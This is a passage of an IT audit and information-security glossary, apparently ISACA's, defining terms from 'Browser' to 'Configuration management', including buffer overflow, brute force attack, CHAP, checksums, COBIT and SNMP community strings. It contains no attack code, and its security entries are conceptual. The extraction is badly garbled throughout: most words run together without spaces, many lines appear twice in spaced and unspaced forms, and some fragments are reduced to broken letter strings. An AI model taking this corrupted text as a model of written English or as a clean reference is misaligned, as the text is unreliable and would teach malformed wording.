Browser Acomputerprogramthatenablestheusertoretrieveinformationthathasbeenmadepublicly
availableontheInternet;also,thatpermitsmultimedia(graphics)applicationsontheWorld
WideWeb
Bruteforce Aclassofalgorithmsthatrepeatedlytryallpossiblecombinationsuntilasolutionisfound
Bruteforceattack Repeatedlytryingallpossiblecombinationsofpasswordsorencryptionkeysuntilthecorrect
oneisfound
Budget Estimatedcostandrevenueamountsforagivenrangeofperiodsandsetofbooks
ScopeNote:Therecanbemultiplebudgetversionsforthesamesetofbooks.
Budgetformula Amathematicalexpressionusedtocalculatebudgetamountsbasedonactualresults,other
budgetamountsandstatistics.
ScopeNote:Withbudgetformulas,budgetsusingcomplexequations,calculationsand
allocationscanbeautomaticallycreated.
Budgethierarchy Agroupofbudgetslinkedtogetheratdifferentlevelssuchthatthebudgetingauthorityofa
lowerlevelbudgetiscontrolledbyanupperlevelbudget
B d t i ti A tit (d t t t t di i i th ) ibl f t i d Budgetorganization Anentity(department,costcenter,divisionorothergroup)responsibleforenteringand
maintainingbudgetdata
Buffer Memoryreservedtotemporarilyholddatatooffsetdifferencesbetweentheoperatingspeeds
ofdifferentdevices,suchasaprinterandacomputer
ScopeNote:Inaprogram,buffersarereservedareasofrandomaccessmemory(RAM)that
hold data hile the are being processed holddatawhiletheyarebeingprocessed.
Term Definition
Bufferoverflow Occurswhenaprogramorprocesstriestostoremoredatainabuffer(temporarydatastorage
area) than it was intended to hold area)thanitwasintendedtohold
ScopeNote:Sincebuffersarecreatedtocontainafiniteamountofdata,theextra
informationwhichhastogosomewherecanoverflowintoadjacentbuffers,corruptingor
overwritingthevaliddataheldinthem.Althoughitmayoccuraccidentallythrough
programmingerror,bufferoverflowisanincreasinglycommontypeofsecurityattackondata
integrity In buffer overflow attacks the extra data may contain codes designed to trigger integrity.Inbufferoverflowattacks,theextradatamaycontaincodesdesignedtotrigger
specificactions,ineffectsendingnewinstructionstotheattackedcomputerthatcould,for
example,damagetheuser'sfiles,changedata,ordiscloseconfidentialinformation.Buffer
overflowattacksaresaidtohavearisenbecausetheCprogramminglanguagesuppliedthe
framework,andpoorprogrammingpracticessuppliedthevulnerability.
Bulkdatatransfer Adatarecoverystrategythatincludesarecoveryfromcompletebackupsthatarephysically y gy y p p p y y
shippedoffsiteonceaweek
ScopeNote:Specifically,logsarebatchedelectronicallyseveraltimesdaily,andthenloaded
intoatapelibrarylocatedatthesamefacilityastheplannedrecovery.
Bus Commonpathorchannelbetweenhardwaredevices
ScopeNote:Canbelocatedbetweencomponentsinternaltoacomputerorbetweenexternal
computersinacommunicationnetwork.
Busconfiguration Alldevices(nodes)arelinkedalongonecommunicationlinewheretransmissionsarereceived
byallattachednodes.
ScopeNote:Thisarchitectureisreliableinverysmallnetworks,aswellaseasytouseand
understand.Thisconfigurationrequirestheleastamountofcabletoconnectthecomputers
togetherand,therefore,islessexpensivethanothercablingarrangements.Itisalsoeasyto
extend,andtwocablescanbeeasilyjoinedwithaconnectortomakealongercableformore
computerstojointhenetwork.Arepeatercanalsobeusedtoextendabusconfiguration.
Businessbalanced
scorecard
Atoolformanagingorganizationalstrategythatusesweightedmeasuresfortheareasof
financial performance (lag) indicators internal operations customer measurements learning scorecard financialperformance(lag)indicators,internaloperations,customermeasurements,learning
andgrowth(lead)indicators,combinedtoratetheenterprise
Businesscase Documentationoftherationaleformakingabusinessinvestment,usedbothtosupporta
businessdecisiononwhethertoproceedwiththeinvestmentandasanoperationaltoolto
supportmanagementoftheinvestmentthroughitsfulleconomiclifecycle
Term Definition
Businesscontinuity Preventing,mitigatingandrecoveringfromdisruption
ScopeNote:Thetermsbusinessresumptionplanning,disasterrecoveryplanningand
contingencyplanningalsomaybeusedinthiscontext;theyfocusonrecoveryaspectsof
continuity,andforthatreasontheresilienceaspectshouldalsobetakenintoaccount.
COBIT5perspective
Businesscontinuity
plan(BCP)
Aplanusedbyanenterprisetorespondtodisruptionofcriticalbusinessprocesses.Depends
onthecontingencyplanforrestorationofcriticalsystems
Businesscontrol Thepolicies,procedures,practicesandorganizationalstructuresdesignedtoprovide
reasonableassurancethatthebusinessobjectiveswillbeachievedandundesiredeventswill
bepreventedordetected
Businessdependency Aprocessofidentifyingresourcescriticaltotheoperationofabusinessprocess p y
assessment
p y g p p
Businessfunction Anactivitythatanenterprisedoes,orneedstodo,toachieveitsobjectives
Businessgoal Thetranslationoftheenterprise'smissionfromastatementofintentionintoperformance
targetsandresults
Businessimpact Theneteffect,positiveornegative,ontheachievementofbusinessobjectives
Businessimpact
analysis(BIA)
Aprocesstodeterminetheimpactoflosingthesupportofanyresource
ScopeNote:TheBIAassessmentstudywillestablishtheescalationofthatlossovertime.Itis
predicatedonthefactthatseniormanagement,whenprovidedreliabledatatodocumentthe
potentialimpactofalostresource,canmaketheappropriatedecision.
B i i t E l ti th iti lit d iti it f i f ti t Businessimpact
analysis/assessment
(BIA)
Evaluatingthecriticalityandsensitivityofinformationassets
Anexercisethatdeterminestheimpactoflosingthesupportofanyresourcetoanenterprise,
establishestheescalationofthatlossovertime,identifiestheminimumresourcesneededto
recover,andprioritizestherecoveryofprocessesandthesupportingsystem
S N t Thi l i l d dd i ScopeNote:Thisprocessalsoincludesaddressing:
Incomeloss
Unexpectedexpense
Legalissues(regulatorycomplianceorcontractual)
Interdependentprocesses
Lossofpublicreputationorpublicconfidence
Businessinterruption Anyevent,whetheranticipated(i.e.,publicservicestrike)orunanticipated(i.e.,blackout)that
disruptsthenormalcourseofbusinessoperationsatanenterprise
BusinessModelfor
InformationSecurity
(BMIS)
Aholisticandbusinessorientedmodelthatsupportsenterprisegovernanceandmanagement
informationsecurity,andprovidesacommonlanguageforinformationsecurityprofessionals
andbusinessmanagement
Term Definition
Businessobjective Afurtherdevelopmentofthebusinessgoalsintotacticaltargetsanddesiredresultsand
outcomes outcomes
Businessprocess Aninterrelatedsetofcrossfunctionalactivitiesoreventsthatresultinthedeliveryofa
specificproductorservicetoacustomer
Businessprocess
control
Thepolicies,procedures,practicesandorganizationalstructuresdesignedtoprovide
reasonableassurancethatabusinessprocesswillachieveitsobjectives.
Scope Note: COBIT 5 perspective ScopeNote:COBIT5perspective
Businessprocess
integrity
Controlsoverthebusinessprocessesthataresupportedbytheenterpriseresourceplanning
system(ERP)
Businessprocess
owner
Theindividualresponsibleforidentifyingprocessrequirements,approvingprocessdesignand
managingprocessperformance
ScopeNote:Mustbeatanappropriatelyhighlevelintheenterpriseandhaveauthorityto ScopeNote:Mustbeatanappropriatelyhighlevelintheenterpriseandhaveauthorityto
commitresourcestoprocessspecificriskmanagementactivities
Businessprocess
reengineering(BPR)
Thethoroughanalysisandsignificantredesignofbusinessprocessesandmanagementsystems
toestablishabetterperformingstructure,moreresponsivetothecustomerbaseandmarket
conditions,whileyieldingmaterialcostsavings
Businessrisk Aprobablesituationwithuncertainfrequencyandmagnitudeofloss(orgain)
Businessservice Anapplicationserviceprovider(ASP)thatalsoprovidesoutsourcingofbusinessprocessessuch
provider(BSP) aspaymentprocessing,salesorderprocessingandapplicationdevelopment
Businesssponsor TheindividualaccountablefordeliveringthebenefitsandvalueofanITenabledbusiness
investmentprogramtotheenterprise
Businesstobusiness Transactionsinwhichtheacquirerisanenterpriseoranindividualoperatingintheambitsof
his/herprofessionalactivity.Inthiscase,lawsandregulationsrelatedtoconsumerprotection
li bl arenotapplicable.
ScopeNote:Thecontractsgeneraltermsshouldbecommunicatedtotheotherpartyand
specificallyapproved.Somecompaniesrequiretheotherpartytofilloutcheckboxeswhere
thereisadescriptionsuchas"Ispecificallyapprovetheclauses"Thisisnotconvincing;the
bestsolutionistheadoptionofadigitalsignaturescheme,whichallowstheapprovalof
l d i h h di i di i clauses and terms with the nonrepudiation condition.
Businesstoconsumer Sellingprocessesinwhichtheinvolvedpartiesaretheenterprise,whichoffersgoodsor
services,andaconsumer.Inthiscasethereiscomprehensivelegislationthatprotectsthe
consumer.
ScopeNote:Comprehensivelegislationincludes:
Regarding contracts established outside the merchants property (such as the right to end the Regardingcontractsestablishedoutsidethemerchantsproperty(suchastherighttoendthe
contractwithfullrefundorthereturnpolicyforgoods)
Regardingdistancecontracts(suchasrulesthatestablishhowacontractshouldbewritten,
specificclausesandtheneedtotransmittotheconsumerandapproveit)
Regardingelectronicformofthecontract(suchasontheInternet,thepossibilityforthe
consumer to exit from the procedure without having his/her data recorded)
Term Definition
Businesstoconsumer
ecommerce (B2C)
Referstotheprocessesbywhichenterprisesconductbusinesselectronicallywiththeir
customers and/or public at large using the Internet as the enabling technology ecommerce(B2C) customersand/orpublicatlargeusingtheInternetastheenablingtechnology
Bypasslabel
processing(BLP)
Atechniqueofreadingacomputerfilewhilebypassingtheinternalfile/datasetlabel.This
processcouldresultinbypassingofthesecurityaccesscontrolsystem.
Cadbury TheCommitteeontheFinancialAspectsofCorporateGovernance,setupinMay1991bythe
UKFinancialReportingCouncil,theLondonStockExchangeandtheUKaccountancy
profession, was chaired by Sir Adrian Cadbury and produced a report on the subject commonly profession,waschairedbySirAdrianCadburyandproducedareportonthesubjectcommonly
knownintheUKastheCadburyReport.
Capability Anaptitude,competencyorresourcethatanenterprisemaypossessorrequireatan
enterprise,businessfunctionorindividuallevelthathasthepotential,orisrequired,to
contributetoabusinessoutcomeandtocreatevalue
CapabilityMaturity
Model(CMM)
1.Containstheessentialelementsofeffectiveprocessesforoneormoredisciplines
( )
Italsodescribesanevolutionaryimprovementpathfromadhoc,immatureprocessesto
disciplined,matureprocesseswithimprovedqualityandeffectiveness.
2.CMMforsoftware,fromtheSoftwareEngineeringInstitute(SEI),isamodelusedbymany
enterprisestoidentifybestpracticesusefulinhelpingthemassessandincreasethematurity
oftheirsoftwaredevelopmentprocesses p p
ScopeNote:CMMrankssoftwaredevelopmententerprisesaccordingtoahierarchyoffive
processmaturitylevels.Eachlevelranksthedevelopmentenvironmentaccordingtoits
capabilityofproducingqualitysoftware.Asetofstandardsisassociatedwitheachofthefive
levels.Thestandardsforlevelonedescribethemostimmatureorchaoticprocessesandthe
standardsforlevelfivedescribethemostmatureorqualityprocesses. q y p
Amaturitymodelthatindicatesthedegreeofreliabilityordependencythebusinesscanplace
onaprocessachievingthedesiredgoalsorobjectives
Acollectionofinstructionsthatanenterprisecanfollowtogainbettercontroloverits
software development process
Capacity stress testing Testing an application with large quantities of data to evaluate its performance during peak Capacitystresstesting Testinganapplicationwithlargequantitiesofdatatoevaluateitsperformanceduringpeak
periods.Alsocalledvolumetesting
Capital
expenditure/expense
(CAPEX)
Anexpenditurethatisrecordedasanassetbecauseitisexpectedtobenefitmorethanthe
currentperiod.Theassetisthendepreciatedoramortizedovertheexpectedusefullifeofthe
asset.
Term Definition
Cardswipe AphysicalcontroltechniquethatusesasecuredcardorIDtogainaccesstoahighlysensitive
location location.
ScopeNote:Ifbuiltcorrectly,cardswipesactasapreventivecontroloverphysicalaccessto
thosesensitivelocations.Afteracardhasbeenswiped,theapplicationattachedtothe
physicalcardswipedevicelogsallcarduserswhotrytoaccessthesecuredlocation.Thecard
swipedevicepreventsunauthorizedaccessandlogsallattemptstoenterthesecuredlocation.
Cathoderaytube
(CRT)
Avacuumtubethatdisplaysdatabymeansofanelectronbeamstrikingthescreen,whichis
coatedwithsuitablephosphormaterialoradevicesimilartoatelevisionscreenonwhichdata
canbedisplayed
Centralprocessing
unit(CPU)
Computerhardwarethathousestheelectroniccircuitsthatcontrol/directalloperationsofthe
computersystem
Centralizeddata Identifiedbyonecentralprocessoranddatabasesthatformadistributedprocessing
processing
y p p g
configuration
Certificate
(Certification)
authority(CA)
Atrustedthirdpartythatservesauthenticationinfrastructuresorenterprisesandregisters
entitiesandissuesthemcertificates
Certificaterevocation
list(CRL)
Aninstrumentforcheckingthecontinuedvalidityofthecertificatesforwhichthecertification
authority(CA)hasresponsibility
ScopeNote:TheCRLdetailsdigitalcertificatesthatarenolongervalid.Thetimegapbetween
twoupdatesisverycriticalandisalsoariskindigitalcertificatesverification.
Certificationpractice
statement(CPS)
Adetailedsetofrulesgoverningthecertificateauthority'soperations.Itprovidesan
understandingofthevalueandtrustworthinessofcertificatesissuedbyagivencertificate
h i (C ) authority(CA).
ScopeNote:Intermsofthecontrolsthatanenterpriseobserves,themethoditusesto
validatetheauthenticityofcertificateapplicantsandtheCA'sexpectationsofhowits
certificatesmaybeused
Chainofcustody Alegalprincipleregardingthevalidityandintegrityofevidence.Itrequiresaccountabilityfor
anything that will be used as evidence in a legal proceeding to ensure that it can be accounted anythingthatwillbeusedasevidenceinalegalproceedingtoensurethatitcanbeaccounted
forfromthetimeitwascollecteduntilthetimeitispresentedinacourtoflaw.
ScopeNote:Includesdocumentationastowhohadaccesstotheevidenceandwhen,aswell
astheabilitytoidentifyevidenceasbeingtheexactitemthatwasrecoveredortested.Lackof
controloverevidencecanleadtoitbeingdiscredited.Chainofcustodydependsontheability
to verify that evidence could not have been tampered with This is accomplished by sealing off toverifythatevidencecouldnothavebeentamperedwith.Thisisaccomplishedbysealingoff
theevidence,soitcannotbechanged,andprovidingadocumentaryrecordofcustodyto
provethattheevidencewasatalltimesunderstrictcontrolandnotsubjecttotampering.
Term Definition
Challenge/response
token
AmethodofuserauthenticationthatiscarriedoutthroughuseoftheChallengeHandshake
Authentication Protocol (CHAP) token AuthenticationProtocol(CHAP)
ScopeNote:WhenausertriestologintotheserverusingCHAP,theserversendstheusera
"challenge,"whichisarandomvalue.Theuserentersapassword,whichisusedasan
encryptionkeytoencryptthe"challenge"andreturnittotheserver.Theserverisawareof
thepassword.It,therefore,encryptsthe"challenge"valueandcomparesitwiththevalue
received from the user If the values match the user is authenticated The challenge/response receivedfromtheuser.Ifthevaluesmatch,theuserisauthenticated.Thechallenge/response
activitycontinuesthroughoutthesessionandthisprotectsthesessionfrompasswordsniffing
attacks.Inaddition,CHAPisnotvulnerableto"maninthemiddle"attacksbecausethe
challengevalueisarandomvaluethatchangesoneachaccessattempt.
Changemanagement Aholisticandproactiveapproachtomanagingthetransitionfromacurrenttoadesired
organizationalstate,focusingspecificallyonthecriticalhumanor"soft"elementsofchange g , g p y g
ScopeNote:Includesactivitiessuchasculturechange(values,beliefsandattitudes),
developmentofrewardsystems(measuresandappropriateincentives),organizationaldesign,
stakeholdermanagement,humanresources(HR)policiesandprocedures,executivecoaching,
changeleadershiptraining,teambuildingandcommunicationplanningandexecution
Channelservice
unit/digitalservice
unit(CSU/DSU)
Interfacesatthephysicallayeroftheopensystemsinterconnection(OSI)referencemodel,
dataterminalequipment(DTE)todatacircuitterminatingequipment(DCE),forswitched
carriernetworks
Chargeback Theredistributionofexpenditurestotheunitswithinacompanythatgaverisetothem.
S Ch b k i i b i h h li i l di i b ScopeNote:Chargebackisimportantbecausewithoutsuchapolicy,misleadingviewsmaybe
givenastotherealprofitabilityofaproductorservicebecausecertainkeyexpenditureswill
beignoredorcalculatedaccordingtoanarbitraryformula.
Checkdigit Anumericvalue,whichhasbeencalculatedmathematically,isaddedtodatatoensurethat
originaldatahavenotbeenalteredorthatanincorrect,butvalidmatchhasoccurred.
ScopeNote:Checkdigitcontroliseffectiveindetectingtranspositionandtranscriptionerrors.
Checkdigit
verification(self
checking digit)
Aprogrammededitorroutinethatdetectstranspositionandtranscriptionerrorsbycalculating
andcheckingthecheckdigit
checkingdigit)
Checklist Alistofitemsthatisusedtoverifythecompletenessofataskorgoal
ScopeNote:Usedinqualityassurance(andingeneral,ininformationsystemsaudit),tocheck
processcompliance,codestandardizationanderrorprevention,andotheritemsforwhich
consistencyprocessesorstandardshavebeendefined
Term Definition
Checkpointrestart
procedures
Apointinaroutineatwhichsufficientinformationcanbestoredtopermitrestartingthe
computation from that point procedures computationfromthatpoint
Checksum Amathematicalvaluethatisassignedtoafileandusedtotestthefileatalaterdateto
verifythatthedatacontainedinthefilehasnotbeenmaliciouslychanged
ScopeNote:Acryptographicchecksumiscreatedbyperformingacomplicatedseriesof
mathematicaloperations(knownasacryptographicalgorithm)thattranslatesthedatainthe
file into a fixed string of digits called a hash value which is then used as the checksum fileintoafixedstringofdigitscalledahashvalue,whichisthenusedasthechecksum.
Withoutknowingwhichcryptographicalgorithmwasusedtocreatethehashvalue,itishighly
unlikelythatanunauthorizedpersonwouldbeabletochangedatawithoutinadvertently
changingthecorrespondingchecksum.Cryptographicchecksumsareusedindatatransmission
anddatastorage.Cryptographicchecksumsarealsoknownasmessageauthenticationcodes,
integritycheckvalues,modificationdetectioncodesormessageintegritycodes.
Chiefexecutiveofficer
(CEO)
Thehighestrankingindividualinanenterprise
Chieffinancialofficer
(CFO)
Theindividualprimarilyresponsibleformanagingthefinancialriskofanenterprise
Chiefinformation
officer(CIO)
ThemostseniorofficialoftheenterprisewhoisaccountableforITadvocacy,aligningITand
businessstrategies,andplanning,resourcingandmanagingthedeliveryofITservices,
informationandthedeploymentofassociatedhumanresources
ScopeNote:Insomecases,theCIOrolehasbeenexpandedtobecomethechiefknowledge
officer(CKO)whodealsinknowledge,notjustinformation.Alsoseechieftechnologyofficer
(CTO).
ChiefInformation
S i Offi (CISO)
Thepersoninchargeofinformationsecuritywithintheenterprise
SecurityOfficer(CISO)
ChiefSecurityOfficer
(CSO)
Thepersonusuallyresponsibleforallsecuritymattersbothphysicalanddigitalinan
enterprise
Chieftechnology
officer(CTO)
Theindividualwhofocusesontechnicalissuesinanenterprise
Scope Note: Often viewed as synonymous with chief information officer (CIO) ScopeNote:Oftenviewedassynonymouswithchiefinformationofficer(CIO)
Cipher Analgorithmtoperformencryption
Ciphertext Informationgeneratedbyanencryptionalgorithmtoprotecttheplaintextandthatis
unintelligibletotheunauthorizedreader.
Circuitswitched
network
Adatatransmissionservicerequiringtheestablishmentofacircuitswitchedconnection
beforedatacanbetransferredfromsourcedataterminalequipment(DTE)toasinkDTE
ScopeNote:Acircuitswitcheddatatransmissionserviceusesaconnectionnetwork.
Circularrouting Inopensystemsarchitecture,circularroutingisthelogicalpathofamessageina
communicationnetworkbasedonaseriesofgatesatthephysicalnetworklayerintheopen
systemsinterconnection(OSI)model.
Term Definition
Cleartext Datathatisnotencrypted.Alsoknownasplaintext.
Clientserver A group of computers connected by a communication network in which the client is the Clientserver Agroupofcomputersconnectedbyacommunicationnetwork,inwhichtheclientisthe
requestingmachineandtheserveristhesupplyingmachine
ScopeNote:Softwareisspecializedatbothends.Processingmaytakeplaceoneitherthe
clientortheserver,butitistransparenttotheuser.
Cloudcomputing Convenient,ondemandnetworkaccesstoasharedpoolofresourcesthatcanberapidly
provisioned and released with minimal management effort or service provider interaction provisionedandreleasedwithminimalmanagementeffortorserviceproviderinteraction
Clustercontroller Acommunicationterminalcontrolhardwareunitthatcontrolsanumberofcomputer
terminals
ScopeNote:Allmessagesarebufferedbythecontrollerandthentransmittedtothereceiver.
Coaxialcable Composedofaninsulatedwirethatrunsthroughthemiddleofeachcable,asecondwirethat
surroundstheinsulationoftheinnerwirelikeasheath,andtheouterinsulationwhichwraps
thesecondwire
ScopeNote:Hasagreatertransmissioncapacitythanstandardtwistedpaircables,buthasa
limitedrangeofeffectivedistance
COBIT 1.COBIT5:FormerlyknownasControlObjectivesforInformationandrelatedTechnology
(COBIT);nowusedonlyastheacronyminitsfifthiteration.Acomplete,internationally
acceptedframeworkforgoverningandmanagingenterpriseinformationandtechnology(IT)
thatsupportsenterpriseexecutivesandmanagementintheirdefinitionandachievementof
businessgoalsandrelatedITgoals.COBITdescribesfiveprinciplesandsevenenablersthat
supportenterprisesinthedevelopment,implementation,andcontinuousimprovementand
monitoringofgoodITrelatedgovernanceandmanagementpractices
ScopeNote:EarlierversionsofCOBITfocusedoncontrolobjectivesrelatedtoITprocesses,
managementandcontrolofITprocessesandITgovernanceaspects.Adoptionanduseofthe
COBITframeworkaresupportedbyguidancefromagrowingfamilyofsupportingproducts.
(Seewww.isaca.org/cobitformoreinformation.)
2.COBIT4.1andearlier:FormallyknownasControlObjectivesforInformationandrelated
Technology(COBIT).Acomplete,internationallyacceptedprocessframeworkforITthat
supportsbusinessandITexecutivesandmanagementintheirdefinitionandachievementof
businessgoalsandrelatedITgoalsbyprovidingacomprehensiveITgovernance,management,
controlandassurancemodel.COBITdescribesITprocessesandassociatedcontrolobjectives,
management guidelines (activities accountabilities responsibilities and performance metrics)
CoCo CriteriaofControl,publishedbytheCanadianInstituteofCharteredAccountantsin1995
Term Definition
Codeofethics Adocumentdesignedtoinfluenceindividualandorganizationalbehaviorofemployees,by
defining organizational values and the rules to be applied in certain situations definingorganizationalvaluesandtherulestobeappliedincertainsituations.
ScopeNote:Acodeofethicsisadoptedtoassistthoseintheenterprisecalledupontomake
decisionsunderstandthedifferencebetween'right'and'wrong'andtoapplythis
understandingtotheirdecisions.
COBIT 5 perspective COBIT5perspective
Coevolving Originatedasabiologicalterm,referstothewaytwoormoreecologicallyinterdependent
speciesbecomeintertwinedovertime
ScopeNote:Asthesespeciesadapttotheirenvironmenttheyalsoadapttooneanother.
Todaysmultibusinesscompaniesneedtotaketheircuefrombiologytosurvive.Theyshould Today smulti businesscompaniesneedtotaketheircuefrombiologytosurvive.Theyshould
assumethatlinksamongbusinessesaretemporaryandthatthenumberofconnectionsnot
justtheircontentmatters.Ratherthanplancollaborativestrategyfromthetop,astraditional
companiesdo,corporateexecutivesincoevolvingcompaniesshouldsimplysetthecontext
andletcollaboration(andcompetition)emergefrombusinessunits.
Coherence Establishingapotentbindingforceandsenseofdirectionandpurposefortheenterprise,
relatingdifferentpartsoftheenterprisetoeachotherandtothewholetoactasaseemingly
uniqueentity
Cohesion Theextenttowhichasystemunitsubroutine,program,module,component,subsystem
performsasinglededicatedfunction.
ScopeNote:Generally,themorecohesivetheunit,theeasieritistomaintainandenhancea
systembecauseitiseasiertodeterminewhereandhowtoapplyachange.
Coldsite AnISbackupfacilitythathasthenecessaryelectricalandphysicalcomponentsofacomputer
facility,butdoesnothavethecomputerequipmentinplace
ScopeNote:Thesiteisreadytoreceivethenecessaryreplacementcomputerequipmentin
theeventthattheusershavetomovefromtheirmaincomputinglocationtothealternative
t f ilit computerfacility.
Collision Thesituationthatoccurswhentwoormoredemandsaremadesimultaneouslyonequipment
thatcanhandleonlyoneatanygiveninstant(FederalStandard1037C)
CombinedCodeon
Corporate
Governance
Theconsolidationin1998ofthe"Cadbury,""Greenbury"and"Hampel"Reports
ScopeNote:NamedaftertheCommitteeChairs,thesereportsweresponsoredbytheUK
Financial Reporting Council the London Stock Exchange the Confederation of British Industry FinancialReportingCouncil,theLondonStockExchange,theConfederationofBritishIndustry,
theInstituteofDirectors,theConsultativeCommitteeofAccountancyBodies,theNational
AssociationofPensionFundsandtheAssociationofBritishInsurerstoaddressthefinancial
aspectsofcorporategovernance,directors'remunerationandtheimplementationofthe
CadburyandGreenburyrecommendations.
Term Definition
CommonAttack
Pattern Enumeration
Acatalogueofattackpatternsasanabstractionmechanismforhelpingdescribehowan
attack against vulnerable systems or networks is executed published by the MITRE PatternEnumeration
andClassification
(CAPEC)
attackagainstvulnerablesystemsornetworksisexecuted publishedbytheMITRE
Corporation
Communication
processor
Acomputerembeddedinacommunicationssystemthatgenerallyperformsthebasictasksof
classifyingnetworktrafficandenforcingnetworkpolicyfunctions
Scope Note: An example is the message data processor of a defense digital network (DDN) ScopeNote:Anexampleisthemessagedataprocessorofadefensedigitalnetwork(DDN)
switchingcenter.Moreadvancedcommunicationprocessorsmayperformadditional
functions.
Communications
controller
Smallcomputersusedtoconnectandcoordinatecommunicationlinksbetweendistributedor
remotedevicesandthemaincomputer,thusfreeingthemaincomputerfromthisoverhead
function
Communitystrings Authenticateaccesstomanagementinformationbase(MIB)objectsandfunctionas y g g ( ) j
embeddedpasswords
ScopeNote:Examplesare:
Readonly(RO)GivesreadaccesstoallobjectsintheMIBexceptthecommunitystrings,but
doesnotallowwriteaccess
Readwrite(RW)GivesreadandwriteaccesstoallobjectsintheMIB,butdoesnotallow ( ) j ,
accesstothecommunitystrings
ReadwriteallGivesreadandwriteaccesstoallobjectsintheMIB,includingthecommunity
strings(onlyvalidforCatalyst4000,5000and6000seriesswitches)
SimpleNetworkManagementProtocol(SNMP)communitystringsaresentacrossthenetwork
incleartext.Thebestwaytoprotectanoperatingsystem(OS)softwarebaseddevicefrom y p p g y ( )
unauthorizedSNMPmanagementistobuildastandardIPaccesslistthatincludesthesource
addressofthemanagementstation(s).Multipleaccesslistscanbedefinedandtiedto
differentcommunitystrings.Ifloggingisenabledontheaccesslist,thenlogmessagesare
generatedeverytimethatthedeviceisaccessedfromthemanagementstation.Thelog
message records the source IP address of the packet
Comparisonprogram Aprogramfortheexaminationofdata,usinglogicalorconditionalteststodetermineorto
identify similarities or differences identifysimilaritiesordifferences
Compartmentalizatio
n
Aprocessforprotectingveryhighvalueassetsorinenvironmentswheretrustisanissue.
Accesstoanassetrequirestwoormoreprocesses,controlsorindividuals.
Compensatingcontrol Aninternalcontrolthatreducestheriskofanexistingorpotentialcontrolweaknessresulting
inerrorsandomissions
Competence Theabilitytoperformaspecifictask,actionorfunctionsuccessfully
Competencies Thestrengthsofanenterpriseorwhatitdoeswell
ScopeNote:Canrefertotheknowledge,skillsandabilitiesoftheassuranceteamor
individualsconductingthework.
Term Definition
Compiler Aprogramthattranslatesprogramminglanguage(sourcecode)intomachineexecutable
instructions (object code) instructions(objectcode)
Completely
AutomatedPublic
Touringtesttotell
Computersand
HumansApart
(CAPTCHA)
Atypeofchallengeresponsetestusedincomputingtoensurethattheresponseisnot
generatedbyacomputer.Anexampleisthesiterequestforwebsiteuserstorecognizeand
typeaphrasepostedusingvariouschallengingtoreadfonts.
(CAPTCHA)
Completely
connected(mesh)
configuration
Anetworktopologyinwhichdevicesareconnectedwithmanyredundantinterconnections
betweennetworknodes(primarilyusedforbackbonenetworks)
Completenesscheck Aproceduredesignedtoensurethatnofieldsaremissingfromarecord
Compliance Adherenceto,andtheabilitytodemonstrateadherenceto,mandatedrequirementsdefined
bylawsandregulations,aswellasvoluntaryrequirementsresultingfromcontractual y g , y q g
obligationsandinternalpolicies
Compliance
documents
Policies,standardandproceduresthatdocumenttheactionsthatarerequiredorprohibited.
Violationsmaybesubjecttodisciplinaryactions.
Compliancetesting Testsofcontroldesignedtoobtainauditevidenceonboththeeffectivenessofthecontrols
andtheiroperationduringtheauditperiod
Component Ageneraltermthatisusedtomeanonepartofsomethingmorecomplex
ScopeNote:Forexample,acomputersystemmaybeacomponentofanITservice,oran
applicationmaybeacomponentofareleaseunit.Componentsarecooperatingpackagesof
executablesoftwarethatmaketheirservicesavailablethroughdefinedinterfaces.
Componentsusedindevelopingsystemsmaybecommercialofftheshelfsoftware(COTS)or
maybepurposelybuilt.However,thegoalofcomponentbaseddevelopmentistoultimately
useasmanypredeveloped,pretestedcomponentsaspossible.
Comprehensiveaudit Anauditdesignedtodeterminetheaccuracyoffinancialrecordsaswellastoevaluatethe
internalcontrolsofafunctionordepartment
Computationally
greedy
Requiringagreatdealofcomputingpower;processorintensive
Computer emergency A group of people integrated at the enterprise with clear lines of reporting and responsibilities Computeremergency
responseteam(CERT)
Agroupofpeopleintegratedattheenterprisewithclearlinesofreportingandresponsibilities
forstandbysupportincaseofaninformationsystemsemergency
Thisgroupwillactasanefficientcorrectivecontrol,andshouldalsoactasasinglepointof
contactforallincidentsandissuesrelatedtoinformationsystems.
Term Definition
Computerforensics Theapplicationofthescientificmethodtodigitalmediatoestablishfactualinformationfor
judicial review judicialreview
ScopeNote:Thisprocessofteninvolvesinvestigatingcomputersystemstodeterminewhether
theyareorhavebeenusedforillegalorunauthorizedactivities.Asadiscipline,itcombines
elementsoflawandcomputersciencetocollectandanalyzedatafrominformationsystems
(e.g.,personalcomputers,networks,wirelesscommunicationanddigitalstoragedevices)ina
way that is admissible as evidence in a court of law waythatisadmissibleasevidenceinacourtoflaw.
Computersequence
checking
Verifiesthatthecontrolnumberfollowssequentiallyandthatanycontrolnumbersoutof
sequencearerejectedornotedonanexceptionreportforfurtherresearch
Computerserver 1.Acomputerdedicatedtoservicingrequestsforresourcesfromothercomputersona
network.Serverstypicallyrunnetworkoperatingsystems.
2.Acomputerthatprovidesservicestoanothercomputer(theclient)
Computeraided
softwareengineering
(CASE)
Theuseofsoftwarepackagesthataidinthedevelopmentofallphasesofaninformation
system
ScopeNote:Systemanalysis,designprogramminganddocumentationareprovided.Changes
introducedinoneCASEchartwillupdateallotherrelatedchartsautomatically.CASEcanbe p y
installedonamicrocomputerforeasyaccess.
Computerassisted
audittechnique
(CAAT)
Anyautomatedaudittechnique,suchasgeneralizedauditsoftware(GAS),testdata
generators,computerizedauditprogramsandspecializedauditutilities
Concurrencycontrol Referstoaclassofcontrolsusedinadatabasemanagementsystem(DBMS)toensurethat
transactionsareprocessedinanatomic,consistent,isolatedanddurablemanner(ACID).This
i li h l i l d bl h d l i d d h i d impliesthatonlyserialandrecoverableschedulesarepermitted,andthatcommitted
transactionsarenotdiscardedwhenundoingabortedtransactions.
Concurrentaccess Afailoverprocess,inwhichallnodesrunthesameresourcegroup(therecanbeno[Internet
Protocol]IPor[mandatoryaccesscontrol]MACaddressinaconcurrentresourcegroup)and
accesstheexternalstorageconcurrently
Confidentiality Preserving authorized restrictions on access and disclosure including means for protecting Confidentiality Preservingauthorizedrestrictionsonaccessanddisclosure,includingmeansforprotecting
privacyandproprietaryinformation
Configurablecontrol Typically,anautomatedcontrolthatisbasedon,andthereforedependenton,the
configurationofparameterswithintheapplicationsystem
Configurationitem
(CI)
Componentofaninfrastructureoranitem,suchasarequestforchange,associatedwithan
infrastructurewhichis(oristobe)underthecontrolofconfigurationmanagement
ScopeNote:Mayvarywidelyincomplexity,sizeandtype,fromanentiresystem(includingall
hardware,softwareanddocumentation)toasinglemoduleoraminorhardwarecomponent
Term Definition
Configuration
management
